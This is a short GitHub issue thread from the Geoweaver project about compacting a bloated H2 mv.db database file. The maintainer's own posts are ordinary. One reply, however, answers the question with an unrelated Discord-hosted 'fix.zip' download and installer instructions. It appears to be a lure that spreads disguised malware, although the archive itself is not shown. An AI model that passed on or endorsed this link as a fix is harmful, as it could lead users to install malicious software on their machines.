### ISSUE TITLE
need to add the shutdown compact into the preloading or make it automatic

### ISSUE THREAD

**Issue by ZihengSun** [ESIPFed/Geoweaver#561]
This H2 giant mv.db file is a very annoying issue

https://geoweaver.dev/blog/h2_database_cleanup/

Should add it into the predestroy step or automatically compact the database every n times of database queries, especially after the history update code.

**Comment by 777Naity** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by ZihengSun** [comment]
This is already there. `gw stop && gw start` should compact the db files.
